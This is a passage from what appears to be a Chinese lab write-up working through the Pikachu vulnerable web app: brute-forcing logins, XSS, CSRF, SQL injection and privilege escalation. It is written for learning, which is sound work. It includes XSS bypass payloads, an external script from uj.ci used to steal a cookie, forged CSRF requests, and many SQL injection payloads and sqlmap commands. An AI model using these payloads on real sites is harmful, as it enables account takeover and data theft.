如果response中没有<code>username or password is not exists</code>可以说明破解成功</p><p>步骤:</p><ol><li>尝试手动提交表单, 使用brupsuite拦截<br><img src="https://i0.imgs.ovh/2024/02/03/bSOeR.png"></li><li>发送到Intruder, 关闭拦截, 配置好payload和字典, 开始进行破解(Cluster bomb)</li><li>对结果按照长度或有无<code>username or password is not exists</code>进行整理, 发现test/abc123和admin/123456可能是正确的, 验证后,可以确认破解成功<br><img src="https://i0.imgs.ovh/2024/02/03/bSdpW.png"></li></ol><h4 id="验证码绕过-on-server"><a href="#验证码绕过-on-server" class="headerlink" title="验证码绕过(on server)"></a>验证码绕过(on server)</h4><p>验证码在后端会进行验证, 但是验证码可以被重复利用, 因此可以手动输入正确的验证码, 然后一直利用该验证码进行破解, 其余操作同上</p><p><img src="https://i0.imgs.ovh/2024/02/03/bSD8e.png"></p><ul><li><em>原因: php中 session默认的过期时间为1440秒, 后端没有对此进行设置, 因此这段时间内验证码可以一直用</em></li></ul><h4 id="验证码绕过-on-client"><a href="#验证码绕过-on-client" class="headerlink" title="验证码绕过(on client)"></a>验证码绕过(on client)</h4><p>验证码只能在前端限制客户端发包, 非常容易解除, 没有很好的验证效果, 其余操作同上</p><h4 id="token防爆破"><a href="#token防爆破" class="headerlink" title="token防爆破"></a>token防爆破</h4><p>由于token已经出现在前端代码中, 因此我们可以轻易获取, 我先猜测用户名为admin, 然后通过音叉模式结合字典和从响应中获取的token进行暴破</p><p><img src="https://i0.imgs.ovh/2024/02/03/buV7s.png"></p><h2 id="XSS跨站脚本"><a href="#XSS跨站脚本" class="headerlink" title="XSS跨站脚本"></a>XSS跨站脚本</h2><h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><h4 id="测试流程-1"><a href="#测试流程-1" class="headerlink" title="测试流程"></a>测试流程</h4><ol><li>在目标站点上找到输入点, 比如查询接口, 留言板等</li><li>输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理</li><li>通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合);</li><li>提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;</li></ol><h4 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h4><ol><li>一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS</li><li>由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器);</li><li>通过变化不同的script,尝试绕过后台过滤机制;</li></ol><h4 id="反射型xss-GET与POST"><a href="#反射型xss-GET与POST" class="headerlink" title="反射型xss(GET与POST)"></a>反射型xss(GET与POST)</h4><ul><li>GET型可以用伪装后的url, 更容易攻击</li></ul><h4 id="XSS绕过"><a href="#XSS绕过" class="headerlink" title="XSS绕过"></a>XSS绕过</h4><ul><li>转换<ul><li>大小写<code><ScRipT></code></li><li>拼凑<code><scr<script>ipt></code></li><li>注释<code><sc<!--a-->ript></code></li></ul></li><li>编码<ul><li>url编码</li><li>html编码</li></ul></li></ul><h4 id="htmlspecialchars-函数"><a href="#htmlspecialchars-函数" class="headerlink" title="htmlspecialchars()函数"></a>htmlspecialchars()函数</h4><p>htmlspecialchars()函数把预定义的字符转换为HTML实体。</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>&(和号)成为&amp<br>“(双引号)成为&quot<br>‘(单引号)成为&#039<br><(小于)成为&lt<br>‘>’(大于)成为&gt</p></blockquote><h3 id="Pikachu关卡-1"><a href="#Pikachu关卡-1" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="反射型xss-get"><a href="#反射型xss-get" class="headerlink" title="反射型xss(get)"></a>反射型xss(get)</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">.="</span><span style="color: #C3E88D"><p class='notice'>who is </span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">['</span><span style="color: #C3E88D">message</span><span style="color: #89DDFF">']}</span><span style="color: #C3E88D">,i don't care!</p></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span></code></pre></div><p>源码没有对message进行任何检查和过滤</p><p>解除前端输入限制后输入<code></p><script>alert();</script><p></code>即可</p><p><img src="https://i0.imgs.ovh/2024/02/03/bxp1J.png"></p><h4 id="反射型xss-post"><a href="#反射型xss-post" class="headerlink" title="反射型xss(post)"></a>反射型xss(post)</h4><p>一次性,会与服务端交互,输入<code></p><sCRiPt sRC=//uj.ci/pq7></sCrIpT><p></code>成功打到cookie<br><img src="https://i0.imgs.ovh/2024/02/03/bxwvW.png"></p><h4 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h4><p>同样没有检查和过滤, 每次刷新都会加载一遍, 输入同上<br><img src="https://i0.imgs.ovh/2024/02/03/bxsBo.png"></p><h4 id="DOM型xss"><a href="#DOM型xss" class="headerlink" title="DOM型xss"></a>DOM型xss</h4><p>输入的内容会被填入超链接<br>输入<code>' onclick='alert()</code>然后点击超链接链接:<br><img src="https://i0.imgs.ovh/2024/02/03/bxKv5.png"></p><h4 id="DOM型xss-x"><a href="#DOM型xss-x" class="headerlink" title="DOM型xss-x"></a>DOM型xss-x</h4><p>输入内容同上, 点击第二个出现的超链接运行, 类似于get反射型xss, 可以通过url攻击<br><img src="https://i0.imgs.ovh/2024/02/03/bx1yp.png"></p><h4 id="xss之盲打"><a href="#xss之盲打" class="headerlink" title="xss之盲打"></a>xss之盲打</h4><p>我留言的内容在后台显示到管理员界面, 因此输入<code></td><script>alert();</script><td></code>, 管理员进入后台后就会被弹窗<br><img src="https://i0.imgs.ovh/2024/02/03/bx5oK.png"></p><h4 id="xss之过滤"><a href="#xss之过滤" class="headerlink" title="xss之过滤"></a>xss之过滤</h4><p><code><script</code>会被过滤掉, 但是换成大写就不会, 比如<code><ScriPt>alert();</SCripT></code><br><img src="https://i0.imgs.ovh/2024/02/03/bxYY2.png" alt="https://i0.imgs.ovh/2024/02/03/bxYY2.png"></p><h4 id="xss之htmlspecialchars"><a href="#xss之htmlspecialchars" class="headerlink" title="xss之htmlspecialchars"></a>xss之htmlspecialchars</h4><p>单引号<code>'</code>没有被处理, 因此可以输入<code>#' onclick=alert();'</code><br><img src="https://i0.imgs.ovh/2024/02/04/beYBl.png"></p><h4 id="xss之herf输出"><a href="#xss之herf输出" class="headerlink" title="xss之herf输出"></a>xss之herf输出</h4><p>这关没有在后端限制只能输入url因此可以填入js代码<code>javascript:alert()</code><br><img src="https://i0.imgs.ovh/2024/02/04/bed1d.png"></p><h4 id="xss之js输出"><a href="#xss之js输出" class="headerlink" title="xss之js输出"></a>xss之js输出</h4><p>关于输入的源码如下:</p><div class="language-html"><button title="Copy code" class="copy"></button><span class="lang">html</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">script</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #BABED8"> $ms</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">432</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8">($ms</span><span style="color: #89DDFF">.</span><span style="color: #BABED8">length </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #BABED8">)</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #F07178">(</span><span style="color: #BABED8">$ms</span><span style="color: #F07178"> </span><span style="color: #89DDFF">==</span><span style="color: #F07178"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmac</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #82AAFF">$</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">#fromjs</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">text</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmac确实厉害,看那小眼神..</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #F07178"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #676E95; font-style: italic">// alert($ms);</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #82AAFF">$</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">#fromjs</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">text</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">无论如何不要放弃心中所爱..</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF"></</span><span style="color: #F07178">script</span><span style="color: #89DDFF">></span></span></code></pre></div><p>可以在<code>$ms='432'</code>构造闭合, 输入<code>tmac'</script><script>alert();</script></code><br><img src="https://i0.imgs.ovh/2024/02/04/beEf2.png"></p><h2 id="CSRF-跨站请求伪造"><a href="#CSRF-跨站请求伪造" class="headerlink" title="CSRF(跨站请求伪造)"></a>CSRF(跨站请求伪造)</h2><h3 id="概述-2"><a href="#概述-2" class="headerlink" title="概述"></a>概述</h3><ul><li>通过伪装来自受信任用户的请求来利用受信任的网站</li></ul><h4 id="与XSS的区别"><a href="#与XSS的区别" class="headerlink" title="与XSS的区别"></a>与XSS的区别</h4><ul><li>XSS可以拿到用户的权限(盗取cookie), 然后实施破坏</li><li>CSRF借用户的权限进行攻击, 而没有拿到用户的权限</li></ul><h4 id="确认是否存在CSRF漏洞"><a href="#确认是否存在CSRF漏洞" class="headerlink" title="确认是否存在CSRF漏洞"></a>确认是否存在CSRF漏洞</h4><ul><li>判断请求是否可以被伪造</li><li>确认凭证的有效期</li></ul><h4 id="Token如何防止CDRF"><a href="#Token如何防止CDRF" class="headerlink" title="Token如何防止CDRF"></a>Token如何防止CDRF</h4><ul><li>每次请求增加一个随机码, 后台每次对次进行验证</li></ul><h3 id="Pikachu关卡-2"><a href="#Pikachu关卡-2" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="CSRF-get"><a href="#CSRF-get" class="headerlink" title="CSRF(get)"></a>CSRF(get)</h4><ul><li><p>假设攻击者是Allen, 可以得到修改信息提交表单时的url为<code>http://192.168.1.9:7071/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=13676767767&add=nba+767&email=allen%40pikachu.com&submit=submit</code></p></li><li><p>假设攻击目标是vince, 已知他目前的个人信息为:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>姓名:vince</p><p>性别:boy</p><p>手机:18626545453</p><p>住址:chain</p><p>邮箱:<a href="mailto:vince@pikachu.com">vince@pikachu.com</a></p></blockquote></li><li><p>要把他的个人信息中的地址修改为<code>moon</code>, 那么可以伪造一个链接<code>http://192.168.1.9:7071/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=moon&email=vince%40pikachu.com&submit=submit</code></p></li><li><p>让vince点击这个链接, 就可以利用vince的权限, 向web发出请求, 修改个人信息<br><img src="https://i0.imgs.ovh/2024/02/04/bgpJU.png"></p></li></ul><h4 id="CSRF-post"><a href="#CSRF-post" class="headerlink" title="CSRF(post)"></a>CSRF(post)</h4><ul><li>post请求中, 表单不在url中, 而在请求体中, 这时可以伪造一个站点, 让vince给伪造站点发出请求, 把请求中的参数进行修改, 向真正的站点提交post请求</li><li>在伪造站点(钓鱼网站)中, 我在表单添加一个action, 让表单提交到真正的网站上<code><form actiom="http://192.168.1.9:7071/vul/csrf/csrfpost/csrf_post_edit.php" method="post"></code></li><li>在vince点击提交时, 将vince的信息进行修改, 即可达成目的<br><img src="https://i0.imgs.ovh/2024/02/04/bgpJU.png"></li></ul><h4 id="CSRF-Token"><a href="#CSRF-Token" class="headerlink" title="CSRF Token"></a>CSRF Token</h4><h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><h3 id="概述-3"><a href="#概述-3" class="headerlink" title="概述"></a>概述</h3><ul><li><p>攻击者可以通过合法输入点提交一些精心构造的语句, 从而欺骗后台数据库对其进行执行, 导致数据库信息泄露</p></li><li><p>例如:<br>正常输入: <code>1</code>, 执行<code>select password from users where id=1</code><br>非法输入:<code>1 or 1=1</code>, 执行<code>select password from users where id=1 or 1=1;</code><br>后者会输出表中的所有password</p></li></ul><h4 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h4><ol><li><p>注入点探测(自动/手动)</p><ul><li>判断注入点类型</li><li>判断查询列数</li><li>判断显示位置</li></ul></li><li><p>信息获取</p><ul><li><p>获取所有数据库名</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>一次性显示全部:group_concat(字段名)</p><p>逐一显示: limit</p></blockquote></li><li><p>获取某数据库所有表名</p></li><li><p>获取某库某表中所有字段名</p></li><li><p>获取字段的数据</p></li></ul></li><li><p>获取权限</p></li></ol><h4 id="注入点类型"><a href="#注入点类型" class="headerlink" title="注入点类型"></a>注入点类型</h4><ul><li>数字型</li><li>字符型: <code>'xxx'</code></li><li>搜索型: <code>%xxx%</code></li></ul><p><em>根据类型进行构造闭合</em></p><h4 id="基于union联合查询的信息获取"><a href="#基于union联合查询的信息获取" class="headerlink" title="基于union联合查询的信息获取"></a>基于union联合查询的信息获取</h4><ul><li>查询列数必须相同</li></ul><h4 id="判断查询列数"><a href="#判断查询列数" class="headerlink" title="判断查询列数"></a>判断查询列数</h4><ul><li>order by: 按照指定字段名进行排序</li></ul><h4 id="基于报错信息获取"><a href="#基于报错信息获取" class="headerlink" title="基于报错信息获取"></a>基于报错信息获取</h4><ul><li>使用一些指定的函数来制造报错, 从报错信息中获取特定的信息</li><li>背景条件: 后台没有屏蔽报错信息, 在语法发生错误时会输出在前端</li></ul><h5 id="报错函数"><a href="#报错函数" class="headerlink" title="报错函数"></a>报错函数</h5><ul><li><p><code>updatexml()</code></p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">updatexml(xml_document, XPathstring, new_value)</span></span><span class="line"><span style="color: #BABED8">#第一个参数: 表中的字段名(字符串)</span></span><span class="line"><span style="color: #BABED8">#第二个参数:Xpath格式的字符串</span></span><span class="line"><span style="color: #BABED8">#String格式,替换查找到的符合条件的</span></span></code></pre></div><p>**”XPath定位必须是有效的, 否则会发送错误”**可以利用这一点制造报错信</p><p>例如<code>updatexml(1,concat(0x7e,database(),0))</code>会产生报错信息, 其中有<code>database()</code>执行的结果</p></li><li><p><code>extractvalue()</code></p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">extractvalue(xml_document, xpath_string)</span></span><span class="line"><span style="color: #BABED8">#同样通过xpath产生报错</span></span></code></pre></div></li><li><p><code>floor()</code><br>取整函数, 示例:</p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">xxx</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"> and (select 2 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#</span></span></code></pre></div></li></ul><h4 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h4><ul><li>后台屏蔽了报错信息, 无法根据报错进行注入的判断 </li><li>分类<ul><li>基于真假, 例:<code>vince' and ascii(substr(database(),1,1))=112#</code></li><li>基于时间, 例:<code>vince' and if((ascii(substr(database(),1,1)))=112,sleep(5),null)#</code></li></ul></li><li>通过<code>ascii(substr((xx语句), n, n))=x</code>判断</li></ul><h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><h3 id="Pikachu关卡-3"><a href="#Pikachu关卡-3" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="数字型注入-post"><a href="#数字型注入-post" class="headerlink" title="数字型注入(post)"></a>数字型注入(post)</h4><ul><li><p>表单内容在前端进行了限制, 但是很容易解除, 比如可以抓包然后进行修改, 下图将原本提交的<code>1</code>修改为<code>1 or 1=1</code><br><img src="https://i0.imgs.ovh/2024/02/04/btJxp.png"></p></li><li><p>提交后, 可以看到所有的用户都被查询成功<br><img src="https://i0.imgs.ovh/2024/02/04/btziT.png"></p></li></ul><h4 id="字符型注入-get"><a href="#字符型注入-get" class="headerlink" title="字符型注入(get)"></a>字符型注入(get)</h4><ul><li><p>构造闭合即可, 先对站点进行测试, 可先传入一些特殊字符比- 如<code>'</code>, <code>"</code>, <code>%</code>等, 下面是输入单引号<code>'</code>的结果,<br><img src="https://i0.imgs.ovh/2024/02/04/btjkl.png"></p></li><li><p>测试发现其后端对查询语句的处理是用单引号<code>'</code>进行包裹的,因此可以用单引号构造闭合, 例如, 输入<code>' or 1=1;#</code>, 同样可以搜索到所有用户, 其中, <code>#</code>对将后面的内容注释掉防止报错</p></li></ul><h4 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a>搜索型注入</h4><ul><li><p>测试发现可以用<code>%'</code>构造闭合, 且输入<code>#%' or 1=1 order by 3;#</code>显示正常,, 但是输入<code>#%' or 1=1 order by 4;#</code>显示异常, 说明总共有三列</p></li><li><p>输入<code>#%' and id=1 union select user(),database(),version();#</code>获取到一些数据库信息</p><p><img src="https://i0.imgs.ovh/2024/02/05/bJMIW.png"></p></li></ul><h4 id="xx型注入"><a href="#xx型注入" class="headerlink" title="xx型注入"></a>xx型注入</h4><ul><li><p>输入<code>'</code>:<br><img src="https://i0.imgs.ovh/2024/02/05/bJsI5.png"></p></li><li><p>通过报错信息的提示可以推断, 应按照<code>('xx')</code>构造闭合<br><img src="https://i0.imgs.ovh/2024/02/05/bJwye.png"></p></li></ul><h4 id="“insert-update”注入"><a href="#“insert-update”注入" class="headerlink" title="“insert/update”注入"></a>“insert/update”注入</h4><ul><li><p>*<em>insert</em></p><ul><li><p>正常没有回显, 但是可以通过报错获取信息</p></li><li><p>payload:<code>xxx' or updatexml(1,concat(0x7e,user()),0) or '</code>获取到user信息:<br><img src="https://i0.imgs.ovh/2024/02/05/biomv.png"></p></li></ul></li><li><p><strong>update</strong></p><ul><li>payload和insert相同</li></ul></li></ul><h4 id="“delete注入”"><a href="#“delete注入”" class="headerlink" title="“delete注入”"></a>“delete注入”</h4><ul><li><p>分析: 根据抓包得到的信息可以发现, 执行删除操作时会向服务器发送一个get请求, 请求中含有要删除内容的数字id,推测在后端有语句<code>delete from xxx where id=78</code><br><img src="https://i0.imgs.ovh/2024/02/06/b8o6o.png"></p></li><li><p>因此可以在此次插入sql语句<code>or updatexml(1,concat(0x7e,xxx),0) </code>制造报错, 从而获取信息<br><img src="https://i0.imgs.ovh/2024/02/06/b8u95.png"><br><img src="https://i0.imgs.ovh/2024/02/06/b8OMs.png"></p></li></ul><h4 id="“http-header”注入"><a href="#“http-header”注入" class="headerlink" title="“http header”注入"></a>“http header”注入</h4><ul><li><p>根据登录后的页面可以得知, 后端对请求头的数据进行了处理, 可以尝试在请求头中插入sql语句</p></li><li><p>将UA头修改为<code>Firefox' or updatexml(1, concat(0x7e, database()) ,0) or '#</code><br><img src="https://i0.imgs.ovh/2024/02/06/b85uu.png"></p><p>得到<br><img src="https://i0.imgs.ovh/2024/02/06/b8Y8l.png"></p></li></ul><h4 id="盲注-base-on-boolean"><a href="#盲注-base-on-boolean" class="headerlink" title="盲注(base on boolean)"></a>盲注(base on boolean)</h4><ul><li>后端可能对报错进行了过滤, 导致没有回显, 但是输入<code>vince' and 1=1#</code>显示<br><img src="https://i0.imgs.ovh/2024/02/07/bqWkO.png"></li><li>输入<code>vince' and 1=2#</code><br><img src="https://i0.imgs.ovh/2024/02/07/bqktH.png"></li><li>根据这点不同可以获取到信息,比如payload为<code>vince' and ascii(substr(database(),1,1))=112#</code>时显示第一种情况, 说明database名的第一个字符为<code>p</code>, 根据这个原理可以不断的尝试直到获取到所有信息</li><li>但是手动操作非常的麻烦, 可以使用自动化工具sqlmap进行操作<br>获取当前数据库名:<code>py .\sqlmap.py -u "http://192.168.5.133:7090/vul/sqli/sqli_blind_b.php?name=1234&submit=%E6%9F%A5%E8%AF%A2" --current-db</code></li><li><img src="https://i0.imgs.ovh/2024/02/07/bq0ND.png"></li><li>获取到数据库名为<code>pikachu</code></li><li>以此类推可以获取到更多信息<br><img src="https://i0.imgs.ovh/2024/02/07/bqhOA.png"></li></ul><h4 id="盲注-base-on-time"><a href="#盲注-base-on-time" class="headerlink" title="盲注(base on time)"></a>盲注(base on time)</h4><ul><li>没有回显, 甚至输入什么都一样, 无法通过前面的基于真假进行判断有无sql注入漏洞</li><li>但是输入<code>vince</code>加载只花了80毫秒左右, 而输入<code>vince' and sleep(5)#</code>却确实花了5秒左右<br><img src="https://i0.imgs.ovh/2024/02/07/bqsD5.png"></li><li>说明sleep(5)确实作为一个sql语句被执行了, 这里存在sql注入漏洞, 结合基于真假的盲注的原理, 可以构造payload:<code>vince' and if((ascii(substr(database(),1,1)))=112,sleep(5),null)#</code></li><li>同样也是5秒后才加载完成, 说明数据库名的第一个字符为<code>p</code>, 也可以使用sqlmap进行自动化操作<br><img src="https://i0.imgs.ovh/2024/02/07/bqbKX.png"></li></ul><h4 id="宽字节注入-1"><a href="#宽字节注入-1" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><ul><li>后端对输入的内容进行了转义, <code>'</code>转义为<code>\'</code>使原本的payload<code>vince' or 1=1 ;#</code>无法使用</li><li>由于mysql使用gbk编码, 单引号转义后编码为<code>%5c%27</code>, 如果在单引号前面输入%df使其变成<code>%df%5c%27</code>前面的<code>%df%5c</code>就会被解析为一个汉字, 单引号<code>%27</code>就成功逃逸了, 实现了闭合</li><li>payload修改为<code>vince%df' or 1=1;#</code><br><img src="https://i0.imgs.ovh/2024/02/07/b9LTA.png"></li></ul><h2 id="越权漏洞"><a href="#越权漏洞" class="headerlink" title="越权漏洞"></a>越权漏洞</h2><h3 id="概述-4"><a href="#概述-4" class="headerlink" title="概述"></a>概述</h3><ul><li><p>由于没有对用户权限进行严格的判断, 导致低权限账号可以去完成高权限账号的操作</p></li><li><p>属于逻辑漏洞, 是由于权限校验的逻辑不够严谨</p></li><li><p>水平越权</p><ul><li>同等权限级别间</li></ul></li><li><p>垂直越权</p><ul><li>不同权限级别间</li></ul></li></ul><h3 id="Pikachu关卡-4"><a href="#Pikachu关卡-4" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="水平越权"><a href="#水平越权" class="headerlink" title="水平越权"></a>水平越权</h4><ul><li><p>登录lucy账号, 然后点击”查看个人信息”的时候会发送一个get请求:<code>http://192.168.1.9:7071/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF</code></p></li><li><p>服务器后台可能没有对用户权限做严格的判断, 